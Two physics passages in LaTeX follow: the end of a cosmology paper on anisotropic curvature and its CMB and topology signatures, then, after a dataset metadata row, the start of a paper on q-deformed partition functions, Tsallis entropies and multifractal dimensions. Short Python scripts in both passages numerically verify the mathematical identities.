A^{20}_{l + 2, l} & \approx & \left( -1\right)^{l} \, \sqrt{l} \, \Omega_{k_0} \, \frac{2}{15 \sqrt{15}} \, \left( l \left( C_{l+2} - C_{l} \right) + \left( C_{l+2} \Delta_{l+2} + C_l \Delta_l \right) - \frac{15}{4} \left( C_{l} - \frac{1}{5} C_{l+2} \right) \right)
\label{Eqn:SIAnswer}
\end{eqnarray}
Since the $C_l$ are smooth functions of $l$, $\left( C_{l+2} - C_{l} \right) \sim \frac{C_l}{l}$. The above correlators then scale as
\begin{equation}
A^{20}_{ll} \sim A^{20}_{l, l+2} \sim \sqrt{l} \, \Omega_{k_0} \, C_l
\end{equation}
We note that these correlators are non-zero for all angular scales. This is precisely because the late time warp caused by the anisotropic curvature affects all the modes in the CMB. Consequently, this is a statistically robust test of anisotropy. Furthermore, this test of anisotropic curvature is immune to degeneracies from the expansion history of the universe that plague the measurement of isotropic curvature. Indeed, in an isotropic universe, irrespective of the cosmological expansion history, this statistic would be zero.
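As a cross-check of this statement, the statistic \eqref{Eqn:SITest} can be evaluated with exact Clebsch-Gordan coefficients. The sketch below (Python with SymPy; taking $C_l = 1$ for illustration) verifies that $A^{20}_{ll}$ vanishes identically for a statistically isotropic spectrum $\langle a_{lm} a^{*}_{l'm'} \rangle = C_l \, \delta_{ll'} \delta_{mm'}$.

```python
from sympy import Integer, simplify
from sympy.physics.quantum.cg import CG

def A_20_ll(l, C_l):
    """Bipolar coefficient A^{20}_{ll} of eq. (SITest) for a diagonal,
    m-independent spectrum <a_lm a*_l'm'> = C_l delta_ll' delta_mm'."""
    total = Integer(0)
    for m in range(-l, l + 1):
        # only m' = m survives the diagonal correlator; (-1)^m' = (-1)^m
        total += C_l * Integer(-1) ** m * CG(l, m, l, -m, 2, 0).doit()
    return simplify(total)

# For a statistically isotropic spectrum the statistic vanishes identically
for l in (2, 3, 4):
    assert A_20_ll(l, Integer(1)) == 0
```

Any non-zero value of this statistic therefore signals a genuine departure from statistical isotropy rather than a choice of expansion history.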
This is similar to the effect discussed in section \ref{SubSec:Rulers} on standard rulers. In both cases, the anisotropic curvature affects measurements along every line of sight, breaking degeneracies with the cosmological expansion history. The similarity between these two effects is not surprising since the statistic \eqref{Eqn:SITest} captures the effect of the angular warp of the CMB by the anisotropic curvature (the third term in \eqref{eq-effects}).
Minimum variance estimators obtained from the CMB temperature/polarization for a power asymmetry of this type and the observability are calculated in \cite{Pullen:2007tu}. Statistical analyses of the sort discussed in this section have been performed with the WMAP data \cite{Bennett:2010jb}. In a universe with anisotropic curvature, these statistical tests can lead to quadrupolar dependence of the two point function. The expected answer for the statistic \eqref{Eqn:SIAnswer} has power only in the $A^{20}_{ll}$ and $A^{20}_{l, l-2}$ modes. Furthermore, since these correlators are proportional to $C_l$, the effect shows a bump around the first acoustic peak. Interestingly, the two point quadrupolar anomaly in the WMAP data shows similar characteristics with power only in the $A^{20}_{ll}$ and $A^{20}_{l, l-2}$ modes, which peaks around the first acoustic peak. This anomaly could be explained in our scenario if the anisotropic curvature $\Omega_ {k_0} \sim 10^{-2}$. However, such a large anisotropic curvature is heavily constrained by the absence of a correspondingly large quadrupole in the CMB (see section \ref{SubSec:CMBQuadrupole}). While this anomaly may be due to other systematic effects \cite{Bennett:2010jb}, similar searches could be performed with upcoming CMB experiments. It is conceivable that these experiments could discover correlations from anisotropic curvatures $\Omega_{k_0} \sim 10^{-4}$, as allowed by the size of the CMB quadrupole.
\subsection{Compact Topology}
We have so far considered only signals arising from the geometry of the universe, but observable signals may also arise from the topology. The normal eternal inflation picture makes it appear that space should be very large or infinite in all directions \cite{Tegmark:2004qd}. If our observable universe nucleated as a bubble from (3+1 dimensional) false vacuum inflation then it will appear as an infinite, open universe. However, in our picture it is natural that the observable universe could have one or two compact dimensions, even though it came from an eternally inflating space \footnote{This assumes of course that the transition to our vacuum was not topology-changing.}. Interestingly, the size of these compact dimensions may be close to the Hubble scale today because the period of slow-roll inflation was not too long. In the case of a 2+1 dimensional parent vacuum, the topology of the spatial dimensions of the observable universe would be $\mathbb{R}^2 \times S^1$. Since the curvature is all in the $\mathbb{R}^2$ and not the $S^1$, the curvature radius of the universe and the topology scale (in this case the radius of the $S^1$) are disconnected. Thus, even though the curvature radius today is restricted to be $\sim 10^2$ times longer than the Hubble scale, the size of the compact dimension can be smaller than the Hubble scale. In fact, we expect that slow-roll inflation began when the curvature radius was around the Hubble scale of inflation. Thus, for the $S^1$ to be around the Hubble scale today it would have needed to be about $10^2$ times smaller than the Hubble size at the beginning of inflation. For high scale inflation this is near the GUT scale, a very believable initial size for that dimension. This scenario is interestingly different from the compact topologies often considered, for which an isotropic geometry ($S^3$, $E^3$ or $H^3$) is usually assumed (though see \cite{Mota:2003jb}). 
Any compact topology necessarily introduces a global anisotropy, but in our scenario even the local geometry of the universe is anisotropic. This allows the curvature radius and the topology scale to be different by orders of magnitude.
Thus it is reasonable that in our picture we may also have the ``circles in the sky" signal of compact topology \cite{Cornish:1996kv}. Current limits from the WMAP data require the topology scale to be greater than 24 Gpc \cite{Cornish:2003db}. This limit can be improved by further searching, especially with data from the Planck satellite, to close to the $\sim 28$ Gpc diameter of our observable universe. If discovered in conjunction with anisotropic curvature, this would provide a dramatic further piece of evidence that we originated in a lower dimensional vacuum. Further, the directions should be correlated. If the parent vacuum was 2+1 dimensional, then we expect the circles in the sky to be in the previously compact direction (the $S^1$) while the curvature is in the other two dimensions. On the other hand, if the parent vacuum was 1+1 dimensional, then it seems possible that both the signals of curvature and the compact topology would be in the same two dimensions, with the third dimension appearing flat and infinite. Thus seeing both the anisotropic curvature and signals of the compact topology may provide another handle for determining the dimensionality of our parent vacuum.
\subsection{Other Measurements}
The CMB is a precise tool to measure cosmological parameters. However, it is a two dimensional snapshot of the universe at a given instant in time. Additional information can be obtained through three dimensional probes of the universe. Several experiments that yield three dimensional data are currently being planned. These include 21 cm tomography experiments and galaxy surveys. A complete study of the effects of anisotropic curvature in these experiments is beyond the scope of this work. In this section, we briefly mention some possible tests of this scenario in these upcoming experiments.
A three dimensional map of the universe can be used to distinguish anisotropic curvature from fluctuations in the matter density. Anisotropic curvature does not lead to inhomogeneities in the matter distribution. Consequently, measurements of the large scale matter density can be used to distinguish between these two situations. Such measurements may be possible using upcoming 21 cm experiments and high redshift surveys, for example LSST. LSST should be sensitive to isotropic curvatures down to $\sim 10^{-3}$ with objects identified out to redshift $z \approx 1$ \cite{Ivezic:2008fe}. Since the dominant effect of anisotropic curvature occurs at late times, LSST should be a good way to probe our signals. Additionally, 21 cm experiments may also be sensitive to isotropic curvatures $\Omega_{k_0} \sim 10^{-4}$ \cite{Mao:2008ug}, and so may offer a very precise test of anisotropic curvature.
The curvature anisotropy also gives rise to a differential Hubble expansion rate $\Delta H \sim \Omega_{k_0} \, H_a$ (see Section \ref{Sec: metric}), which contributes to the quadrupole in the CMB (see section \ref{SubSec:CMB}). This effect will also be visible in direct measurements of the Hubble parameter. Current experimental constraints on this effect are at the level of a few percent \cite{Rubin} and are likely to improve to below $10^{-2}$ in future experiments \cite{Schutz:2001re, MacLeod:2007jd}.
\section{Discussion}
\label{Sec: Conclusions}
A universe produced as a result of bubble nucleation from an ancestor vacuum which has two large dimensions and one small, compact dimension is endowed with anisotropic curvature $\Omega_k$. Such an anisotropic universe is also produced when our 3+1 dimensional universe emerges from a transition from a 1+1 dimensional vacuum. In this case, depending upon the curvature of the compact dimensions, the resulting universe can have either positive or negative curvature along two dimensions, with the other remaining flat. The geometry of the equal time slices of the daughter universe is such that two of the directions are curved while the other dimension is flat. Immediately after the tunneling event, the energy density of the universe is dominated by this anisotropic curvature $\Omega_k$. This curvature drives the curved directions to expand differently from the flat direction, resulting in differential Hubble expansion $\Delta H$ between them.
The expansion of the universe dilutes $\Omega_k$ until it becomes small enough to allow slow roll inflation. At this time, the universe undergoes a period of inflation during which the curvature $\Omega_k$ and the differential Hubble expansion $\Delta H$ are exponentially diluted. However, during the epochs of radiation and matter domination, the curvature red shifts less strongly than either the radiation or the matter density. Consequently, the fractional energy density $\Omega_k$ in curvature grows with time during these epochs. This late time emergence of an anisotropic curvature $\Omega_k$ also drives a late time differential Hubble expansion $\Delta H$ in the universe.
These late time, anisotropic warps of the space-time geometry are all proportional to the current fractional energy density in curvature, $\Omega_{k_0}$. They can be observed in the present epoch if inflation does not last much longer than the minimum number of efolds required to achieve a sufficiently flat universe ($\sim 65$ efolds for high scale inflation). Anisotropic curvature leads to the warping of the angular size of standard rulers. This warping is a function of both the angle and orientation of the ruler in the sky. Consequently, this effect is immune to degeneracies from the expansion history of the universe since it affects rulers that are along the same line of sight but oriented differently.
The CMB is also warped by the anisotropic curvature. In addition to the geometric warping, the differential Hubble expansion $\Delta H$ also preferentially red shifts the energies of the CMB photons. This energy shift differentially changes the monopole temperature of the CMB, giving rise to a quadrupole in the CMB. Furthermore, since the anisotropic curvature is a late time effect, it affects all the modes that can be seen in the CMB. Consequently, this effect leads to statistical anisotropy on all angular scales. This effect is different from other signatures of anisotropy considered in the literature \cite{Gumrukcuoglu:2007bx, Gumrukcuoglu:2008gi}. Previous work has concentrated on the correlations that are produced due to the initial anisotropy in the universe at the beginning of inflation. Since these modes are roughly stretched to the Hubble size today, these initial anisotropies only affect the largest modes in the sky and are hence low $l$ effects in the CMB. The late time anisotropy, however, warps the entire sky and leads to statistically robust correlations on all angular scales. The anisotropies in the pre-inflationary vacuum can, however, lead to other interesting signatures, for example in the gravitational wave spectrum \cite{Gumrukcuoglu:2008gi}. These signatures are an independent check of this scenario. Anisotropies that affect all angular scales have also been previously considered \cite{Ackerman:2007nb, Boehmer:2007ut}. Those scenarios required violations of rotational invariance during inflation, and the anisotropy emerges directly in the primordial density perturbations. In our case, the density perturbations are isotropic and the anisotropy observed today is a result of a late time warp of the space-time.
Anisotropic curvature is already more stringently constrained than isotropic curvature. While isotropic curvature is bounded to be $\lessapprox 10^{-2}$, it is difficult for anisotropic curvature to be much larger than $\sim 10^{-4}$ without running afoul of current data, in particular the size of the CMB quadrupole. Since the measurement of curvature is ultimately limited by cosmic variance $\sim 10^{-5}$, there is a window $ 10^{-5} \lessapprox \Omega_{k_0} \lessapprox 10^{-4}$ that can be probed by upcoming experiments, including Planck.
Future cosmological measurements like the 21 cm experiments will significantly improve bounds on the curvature of the universe. A discovery of isotropic curvature would be evidence suggesting that our ancestor vacuum had at least three large space dimensions. On the other hand, a discovery of anisotropic curvature would be strong evidence for the lower dimensionality of our parent vacuum. The anisotropy produced from such a transition has a very specific form due to the symmetries of the transition. It leads to correlations only amongst certain modes in the CMB (for example, only $A^{20}_{ll}$ and $A^{20}_{l, l-2}$). This distinguishes it from a generic anisotropic $3+1$ dimensional pre-inflationary vacuum which will generically have power in all modes. In these scenarios, it is also natural for the universe to have non-trivial topology. The existence of a non-trivial topological scale within our observable universe can be searched for using the classic ``circles
in the sky" signal. If both the non-trivial topology and anisotropic curvature can be discovered, implying a period of inflation very close to the catastrophic boundary, it would be powerful evidence for a lower dimensional ancestor vacuum. A discovery of these effects would establish the existence of vacua vastly different from our own Standard Model vacuum, lending observational credence to the landscape.
\section*{Acknowledgments}
We would like to thank Savas Dimopoulos, Sergei Dubovsky, Ben Freivogel, Steve Kahn, John March-Russell, Stephen Shenker, Leonard Susskind, and Kirsten Wickelgren for useful discussions and the Dalitz Institute at Oxford for hospitality. S.R. was supported by the DOE Office of Nuclear Physics under grant DE-FG02-94ER40818. S.R. is also supported by NSF grant PHY-0600465.
While this work was in progress we became aware of interesting work by another group working on different signals of a similar general framework \cite{BlancoPillado:2010uw}.
| 2024-02-18T23:40:01.180Z | 2010-09-29T02:00:42.000Z | algebraic_stack_train_0000 | 1,102 | 12,605 |
|
\section{Introduction}
The fractal conception \cite{Mandel} has become a widespread idea in contemporary
science (see Refs. \cite{2,Feder,Sor} for review). A characteristic feature of
fractal sets is known to be self-similarity: if one takes a part of the
whole set, it looks like the original set after appropriate scaling. The formal
basis of self-similarity is the power-law function $F\sim\ell^{h}$ with the
Hurst exponent $h$ (for time series, the value $F$ reduces to the fluctuation
amplitude and $\ell$ to the size of the interval within which this amplitude is
determined). While the simple case of a monofractal is characterized by a single
exponent $h$, a multifractal system is described by a continuous spectrum of
exponents, the singularity spectrum $h(q)$, whose argument $q$ is the exponent
deforming the measures of the elementary boxes that cover the fractal set \cite{multi}.
On the other hand, the parameter $q$ represents the self-similarity degree of the
homogeneous functions intrinsic to self-similar systems \cite{Erzan} (in
this way, within nonextensive thermostatistics, this exponent expresses the
escort probability $P_i\propto p_i^q$ in terms of the original one $p_i$
\cite{T,BS}). In physical applications, a key role is played by the partition
function $Z_q\sim\ell^{\tau(q)}$, with $\ell$ the characteristic size of the boxes
covering the multifractal and the exponent $\tau(q)$ connected with the generalized
Hurst exponent $h(q)$ by the relation $\tau(q)=qh(q)-1$.
As fractals are scale-invariant sets, it is natural to apply the quantum
calculus to describe multifractals. Indeed, quantum analysis is based on the
Jackson derivative
\begin{equation}
\mathcal{D}_x^\lambda=\frac{\lambda^{x\partial_x}-1}{(\lambda-1)x},\quad
\partial_x\equiv\frac{\partial}{\partial x}
\label{1}
\end{equation}
that yields the variation of a function $f(x)$ with respect to a scaling
deformation $\lambda$ of its argument \cite{QC,Gasper}. This idea was first
realized in Ref. \cite{Erzan}, where the support space of the multifractal was
deformed by the action of the Jackson derivative (\ref{1}) on the variable $x$,
reduced to the size $\ell$ of the covering boxes. In this
letter, we use a quite different approach, wherein the deformation is applied to the
multifractal parameter $q$ itself, varying it by means of the finite dilatation
$(\lambda-1)q$ instead of the infinitesimal shift ${\rm d}q$. We demonstrate below
that the related description allows one to generalize the definitions of the partition
function, the mass exponent, and the averages of random variables on the basis
of a deformed expansion in powers of the difference $q-1$. We apply the proposed
formalism to multifractals in mathematical physics
(the Cantor binomial set), econophysics (currency exchange series), and solid
state physics (porous surface condensates).
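As an illustrative aside (added here; not part of the original derivation), the defining property of the Jackson derivative can be checked numerically: acting on a monomial $x^n$, the finite-difference form of eq.~(\ref{1}) produces the basic deformed number $[n]_\lambda$ defined below in eq.~(\ref{10}).

```python
# Numerical sketch (illustrative values): the Jackson derivative of eq. (1),
# (D_x f)(x) = (f(lambda*x) - f(x)) / ((lambda - 1)*x),
# acting on f(x) = x^n yields the basic number [n]_lambda times x^(n-1).

def jackson_derivative(f, x, lam):
    """Finite-dilatation derivative: compares f at lambda*x and at x."""
    return (f(lam * x) - f(x)) / ((lam - 1.0) * x)

def basic_number(n, lam):
    """[n]_lambda = (lambda^n - 1)/(lambda - 1); tends to n as lambda -> 1."""
    return (lam**n - 1.0) / (lam - 1.0)

n, lam, x = 3, 1.5, 2.0
lhs = jackson_derivative(lambda t: t**n, x, lam)
rhs = basic_number(n, lam) * x**(n - 1)
assert abs(lhs - rhs) < 1e-12
```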
\section{Formulation of the problem}
Following the standard scheme \cite{multi,Feder}, we consider a multifractal
set covered by elementary boxes $i=1,2,\dots,W$ with $W\to\infty$. Its
properties are known to be determined by the partition function
\begin{equation}
Z_q=\sum_{i=1}^W p_i^q
\label{Z}
\end{equation}
that takes the value $Z_q=1$ at $q=1$, in accordance with the normalization
condition. Since $p_i\leq 1$ for all boxes $i$, the function (\ref{Z})
decreases monotonically from the maximum magnitude $Z_0=W$ at $q=0$ to
the extreme values $Z_q\simeq p_{\rm ext}^q$, which are determined in the
$|q|\to\infty$ limit by the maximum probability $p_{\rm max}$ on the positive
half-axis $q>0$ and by the minimum one $p_{\rm min}$ on the negative half-axis. In the
simplest case of the uniform distribution $p_i=1/W$, fixed by the statistical
weight $W\gg 1$, one has the exponential decay $Z_q=W^{1-q}$.
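These limiting properties are straightforward to verify numerically; the sketch below (with illustrative probabilities chosen for this example only) checks the normalization $Z_1=1$, the magnitude $Z_0=W$, and the exponential decay of the uniform distribution.

```python
# Numerical sketch of the limits of the partition function Z_q = sum_i p_i^q
# quoted in the text; the probabilities below are illustrative assumptions.

def partition_function(q, p):
    return sum(pi**q for pi in p)

p = [0.5, 0.3, 0.2]              # normalized box probabilities (example values)
W = len(p)

assert abs(partition_function(1.0, p) - 1.0) < 1e-12   # normalization Z_1 = 1
assert abs(partition_function(0.0, p) - W) < 1e-12     # Z_0 = W

# uniform distribution p_i = 1/W gives the exponential decay Z_q = W^(1-q)
uniform = [1.0 / W] * W
for q in (-2.0, 0.5, 3.0):
    assert abs(partition_function(q, uniform) - W**(1.0 - q)) < 1e-12
```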
The cornerstone of our approach is a generalization of the partition function
(\ref{Z}) by means of introducing a deformation parameter $\lambda$ which
defines, together with the self-similarity degree $q$, {\it a modified
partition function} $\mathcal{Z}_q^\lambda$, reduced to the standard form $Z_q$
at $\lambda=1$. To find the explicit form of the function
$\mathcal{Z}_q^\lambda$, we expand the difference
$\mathcal{Z}_q^\lambda-Z_{\lambda}$ into the deformed series over powers of the
difference $q-1$:
\begin{equation}
\mathcal{Z}_q^\lambda:=Z_{\lambda}
-\sum\limits_{n=1}^\infty\frac{\mathcal{S}_{\lambda}^{(n)}}
{[n]_\lambda!}(q-1)_\lambda^{(n)},\quad Z_{\lambda}=\sum_{i=1}^W p_i^{\lambda}.
\label{Z1}
\end{equation}
For arbitrary $x$ and $a$, the deformed binomial \cite{QC,Gasper}
\begin{equation} \label{8}
\begin{split}
(x+a)_\lambda^{(n)}&=(x+a)(x+\lambda a)\dots(x+\lambda^{n-1}a)
\\ &=\sum\limits_{m=0}^n\left[{n\atop
m}\right]_\lambda \lambda^{\frac{m(m-1)}{2}}a^m x^{n-m},\ n\geq 1
\end{split}
\end{equation}
is determined by the coefficients $\left[{n\atop
m}\right]_\lambda=\frac{[n]_\lambda!}{[m]_\lambda![n-m]_\lambda!}$ where
generalized factorials $[n]_\lambda!=[1]_\lambda[2]_\lambda\dots[n]_\lambda$
are given by the basic deformed numbers
\begin{equation}
[n]_\lambda=\frac{\lambda^n-1}{\lambda-1}.
\label{10}
\end{equation}
The coefficients of the expansion (\ref{Z1})
\begin{equation}
\mathcal{S}_{\lambda}^{(n)}=-\left.\big(q\mathcal{D}_q^\lambda\big)^n
Z_q\right|_{q=1},\quad n\geq 1
\label{Z2}
\end{equation}
are defined by the $n$-fold action of the Jackson derivative (\ref{1}) on the
original partition function (\ref{Z}).
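As a numerical consistency check (added for illustration), the product and sum forms of the deformed binomial (\ref{8}) can be compared directly, together with the generalized factorials $[n]_\lambda!$; the values of $x$, $a$, and $\lambda$ below are arbitrary.

```python
# Cross-check of the deformed binomial: the product
# (x+a)(x+lambda*a)...(x+lambda^(n-1)*a) against its expansion over the
# deformed binomial coefficients (Gauss's binomial formula).

def basic_number(n, lam):
    """[n]_lambda = (lambda^n - 1)/(lambda - 1)."""
    return (lam**n - 1.0) / (lam - 1.0)

def basic_factorial(n, lam):
    """[n]_lambda! = [1]_lambda [2]_lambda ... [n]_lambda, with [0]_lambda! = 1."""
    out = 1.0
    for k in range(1, n + 1):
        out *= basic_number(k, lam)
    return out

def deformed_binom_coeff(n, m, lam):
    return basic_factorial(n, lam) / (basic_factorial(m, lam) * basic_factorial(n - m, lam))

def product_form(x, a, n, lam):
    out = 1.0
    for k in range(n):
        out *= x + lam**k * a
    return out

def sum_form(x, a, n, lam):
    return sum(deformed_binom_coeff(n, m, lam) * lam**(m * (m - 1) // 2)
               * a**m * x**(n - m) for m in range(n + 1))

x, a, lam = 0.7, -1.0, 1.3       # a = -1 as in the (q-1) expansions of the text
for n in range(1, 6):
    assert abs(product_form(x, a, n, lam) - sum_form(x, a, n, lam)) < 1e-10
```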
\section{Generalized entropies}
Simple calculations arrive at the explicit expression
\begin{equation}
\mathcal{S}_\lambda^{(n)}=
-\frac{\left[Z_\lambda-1\right]^{(n)}}{(\lambda-1)^n},\quad n\geq 1.
\label{kernel}
\end{equation}
Hereafter, we use {\it the functional binomial}
\begin{equation}
\left[x_t+a\right]^{(n)}:=\sum\limits_{m=0}^n{n\choose m}x_{t^m}a^{n-m}
\label{binomial}
\end{equation}
defined with the standard binomial coefficients ${n\choose
m}=\frac{n!}{m!(n-m)!}$ for an arbitrary function $x_t=x(t)$ and a constant
$a$. The definition (\ref{binomial}) obviously reduces to the Newton
binomial for the trivial function $x_t=t$. The most crucial difference between the
functional binomial and the ordinary one appears at $a=-1$ in the limit
$t\to 0$, when all terms of the sum (\ref{binomial}), apart from the first one
$x_{t^0}=x_1$, become proportional to $x_{t^m}\to x_0$, giving
\begin{equation}
\lim_{t\to 0}\left[x_t-1\right]^{(n)}=(-1)^n(x_1-x_0).
\label{limit}
\end{equation}
At $t=1$, one has $\left[x_1-1\right]^{(n)}=0$.
It is easy to see that the set of coefficients (\ref{kernel}) is expressed in terms
of the Tsallis entropy \cite{T}
\begin{equation}
S_\lambda=-\sum_i\ln_\lambda(p_i)p_i^\lambda=-\frac{Z_\lambda -1}{\lambda-1}
\label{S}
\end{equation}
where the generalized logarithm
$\ln_\lambda(x)=\frac{x^{1-\lambda}-1}{1-\lambda}$ is used. As the $\lambda$
deformation grows, this entropy decreases monotonically, taking the
Boltzmann-Gibbs form $S_1=-\sum_i p_i\ln(p_i)$ at $\lambda=1$. The obvious equality
\begin{equation}
\mathcal{S}_\lambda^{(n)}=-\frac{\left[(1-\lambda)S_\lambda\right]^{(n)}}
{(\lambda-1)^n},\quad n\geq 1
\label{K}
\end{equation}
expresses in explicit form the entropy coefficients (\ref{kernel}) in terms of
the Tsallis entropy (\ref{S}) related to multiple deformations
$\lambda^m$, $0\leq m\leq n$. At $\lambda=0$, when $Z_0=W$, the limit
(\ref{limit}) gives
$\left[S_0\right]^{(n)}=\left[Z_0-1\right]^{(n)}=(-1)^{n-1}(W-1)$, so that
$\mathcal{S}_{0}^{(n)}=W-1\simeq W$. Respectively, in the limit $\lambda\to 1$,
where $S_\lambda\to S_1$ and
$\left[(1-\lambda)S_\lambda\right]^{(n)}\to(1-\lambda)^nS_1^n$, one obtains the
sign-changing values $\mathcal{S}_{1}^{(n)}\to (-1)^{n-1}S_1^n$. Finally, the
limit $|\lambda|\to\infty$, where $S_\lambda\sim\lambda^{-1}$ and
$\left[(1-\lambda)S_\lambda\right]^{(n)}\sim(-1)^n$, is characterized by the
sign-changing power asymptotics
$\mathcal{S}_{\lambda}^{(n)}\sim(-1)^{n-1}\lambda^{-n}$.
For the uniform distribution, when $Z_\lambda=W^{1-\lambda}$, the dependence
(\ref{S}) is characterized by the value $S_0\simeq W$ in the limit $\lambda\ll
1$ and by the asymptotics $S_\lambda\sim 1/\lambda$ at $\lambda\gg 1$ (at the
point $\lambda=1$, one obtains the Boltzmann entropy $S_1=\ln(W)$). As a
result, with the $\lambda$ growth along the positive half-axis, the
coefficients (\ref{kernel}) decrease from the magnitude
$\mathcal{S}_{0}^{(n)}\simeq W$ to the sign-changing values
$\mathcal{S}_{1}^{(n)}=(-1)^{n-1}\left[\ln(W)\right]^n$ and then tend to the
asymptotics $\mathcal{S}_{\lambda}^{(n)}\sim(-1)^{n-1}\lambda^{-n}$; with the
$|\lambda|$ growth along the negative half-axis, the coefficients
(\ref{kernel}) vary non-monotonically, tending to
$\mathcal{S}_{\lambda}^{(n)}\sim-|\lambda|^{-n}$ at $\lambda\to-\infty$.
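The quoted limits of the Tsallis entropy are easy to reproduce numerically; the following sketch (an added illustration with an arbitrarily chosen statistical weight $W$) checks the magnitudes $S_0\simeq W$, $S_1=\ln(W)$, and the asymptotics $S_\lambda\sim 1/\lambda$ for the uniform distribution.

```python
# Numerical sketch of the Tsallis entropy S = -(Z_lambda - 1)/(lambda - 1)
# for the uniform distribution p_i = 1/W (the value of W is illustrative).
import math

def tsallis_entropy(p, lam):
    Z = sum(pi**lam for pi in p)
    return -(Z - 1.0) / (lam - 1.0)

W = 1000
p = [1.0 / W] * W

# S_0 = W - 1, close to W for large statistical weight:
assert abs(tsallis_entropy(p, 0.0) - (W - 1)) < 1e-9
# lambda -> 1 recovers the Boltzmann entropy ln(W):
assert abs(tsallis_entropy(p, 1.0 + 1e-6) - math.log(W)) < 1e-4
# large-lambda asymptotics S_lambda ~ 1/lambda (here Z_lambda is negligible):
assert abs(tsallis_entropy(p, 50.0) - 1.0 / 49.0) < 1e-6
```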
\section{Generalized fractal dimensions}
Within pseudo-thermodynamic picture of multifractal sets \cite{BS}, effective
values of the free energy $\tau_q$, the internal energy $\alpha$, and the
entropy $f$ are defined as follows:
\begin{equation}\label{fa}
\tau_q=\frac{\ln(Z_q)}{\ln(\ell)},\ \alpha=\frac{\sum_i P_i\ln
p_i}{\ln(\ell)},\ f=\frac{\sum_i P_i\ln P_i}{\ln(\ell)}.
\end{equation}
Here, $\ell\ll 1$ stands for a scale, while $p_i$ and $P_i$ are the original and escort
probabilities connected by the definition
\begin{equation}\label{prob}
P_i(q)=\frac{p_i^q}{\sum_i p_i^q}=\frac{p_i^q}{Z_q}.
\end{equation}
Inserting the last equation into the second expression (\ref{fa}), one obtains
the Legendre transform $\tau_q=q\alpha_q-f(\alpha_q)$, where $q$ plays the role
of the inverse temperature and the internal energy is specified by the state
equation $\alpha_q=\frac{{\rm d}\tau_q}{{\rm d}q}$ \cite{Feder}. It is easy to
verify that the escort probability (\ref{prob}) is generated by the mass exponent
given by the first definition (\ref{fa}), with account of eq. (\ref{Z}):
\begin{equation}\label{P}
qP_i(q)=\ln(\ell)p_i\frac{\partial\tau_q}{\partial
p_i}=\frac{\partial\ln(Z_q)}{\partial \ln(p_i)}.
\end{equation}
In line with the proposed generalization, we further introduce {\it a
deformed mass exponent} $\tau_q^\lambda$ related to the original one $\tau_q$
by the condition $\tau_q=\lim_{\lambda\to 1}\tau_q^\lambda$. By
analogy with eq. (\ref{Z1}), we expand this function into the deformed series
\begin{equation}
\tau_q^\lambda:=
\sum\limits_{n=1}^\infty\frac{D_{\lambda}^{(n)}}{[n]_\lambda!}(q-1)_\lambda^{(n)}
\label{tau}
\end{equation}
being the generalization of the known relation $\tau_q=D_q(q-1)$ connecting the
mass exponent $\tau_q$ with the multifractal dimension spectrum $D_q$
\cite{Feder}. Similarly to eqs. (\ref{Z2}, \ref{kernel}), the coefficients
$D_{\lambda}^{(n)}$ are expressed in the form
\begin{equation}
D_\lambda^{(n)}=\left.\big(q\mathcal{D}_q^\lambda\big)^n
\tau_q\right|_{q=1}=\frac{\left[\tau_\lambda-1\right]^{(n)}}{(\lambda-1)^n},\quad
n\geq 1
\label{DD}
\end{equation}
where the use of the definition (\ref{binomial}) assumes that the term with $m=0$
is suppressed because $\tau_{\lambda^0}=0$. At $n=1$, the last equation
(\ref{DD}) obviously reduces to the ordinary form
$D_\lambda^{(1)}=\tau_{\lambda}/(\lambda-1)$, while the coefficients
$D_{\lambda}^{(n)}$ with $n>1$ include terms proportional to $\tau_{\lambda^m}$,
related to multiple deformations $\lambda^m$, $1<m\leq n$. In this way,
the definition (\ref{DD}) yields a hierarchy of multifractal dimension
spectra related to repeated deformations of different orders $n$.
Making use of the limit (\ref{limit}), where the role of a function $x_t$ is
played by the mass exponent $\tau_\lambda$ with $\tau_0=-1$ and $\tau_1=0$,
gives the value $\left[\tau_0-1\right]^{(n)}=(-1)^n$ at the point $\lambda=0$,
where the coefficients (\ref{DD}) take the magnitude $D_0^{(n)}=1$ related to
the dimension of the support segment. In the limits $\lambda\to\pm\infty$,
behavior of the mass exponent $\tau_\lambda\simeq D_{\rm ext}\lambda$ is
determined by extreme values $D_{\rm ext}$ of the multifractal dimensions which
are reduced to the minimum magnitude $D_{\rm min}=D_{\infty}^{(n)}$ and the
maximum one $D_{\rm max}=D_{-\infty}^{(n)}$ \cite{Feder}. On the other hand, in
the limits $\lambda\to\pm\infty$, the extreme values $Z_{\lambda}\simeq p_{\rm
ext}^\lambda$ of the partition function (\ref{Z}) are determined by related
probabilities $p_{\rm ext}$. As a result, the first definition (\ref{fa}) gives
the mass exponents $\tau_\lambda\simeq\lambda\frac{\ln(p_{\rm
ext})}{\ln(\ell)}$ and the coefficients (\ref{DD}) tend to the minimum
magnitude $D_\infty^{(n)}\simeq\frac{\ln(p_{\rm max})}{\ln(\ell)}$ at
$\lambda\to\infty$ and the maximum one $D_{-\infty}^{(n)}\simeq\frac{\ln(p_{\rm
min})}{\ln(\ell)}$ at $\lambda\to-\infty$.
For the uniform distribution, whose partition function is
$Z_\lambda=W^{1-\lambda}$, the expression $Z_\lambda:=\ell^{\tau_\lambda}$
gives the fractal dimension $D=\frac{\ln(W)}{\ln(1/\ell)}$, which tends to $D=1$
when the size of the covering boxes $\ell$ goes to the inverse statistical weight
$1/W$. Being unique, this dimension relates to a monofractal with the mass
exponent $\tau_\lambda=D(\lambda-1)$, whose insertion into the definition
(\ref{DD}) leads to the equal coefficients $D_\lambda^{(n)}=D$ for all orders
$n\geq 1$.
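This monofractal property can be confirmed directly from the functional-binomial form of the coefficients; the sketch below (a numerical illustration with an arbitrarily chosen dimension $D$) verifies that the linear mass exponent $\tau_\lambda=D(\lambda-1)$ yields $D_\lambda^{(n)}=D$ for several orders $n$ and deformations $\lambda$.

```python
# Numerical sketch: for the linear (monofractal) mass exponent
# tau(lam) = D*(lam - 1), every coefficient D_lambda^(n) built from the
# functional binomial collapses to the single dimension D (D is illustrative).
from math import comb

def functional_binomial(x, t, a, n):
    """Functional binomial: sum_m C(n,m) x(t^m) a^(n-m)."""
    return sum(comb(n, m) * x(t**m) * a**(n - m) for m in range(n + 1))

D = 0.65                          # illustrative fractal dimension
tau = lambda lam: D * (lam - 1.0)

for lam in (0.5, 2.0, 3.7):
    for n in range(1, 6):
        D_n = functional_binomial(tau, lam, -1.0, n) / (lam - 1.0)**n
        assert abs(D_n - D) < 1e-9
```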
\section{Relations between generalized entropies and fractal dimensions}
Since either of the deformed series (\ref{Z1}) and (\ref{tau}) describes a
multifractal completely, their coefficients should be connected in some way. It
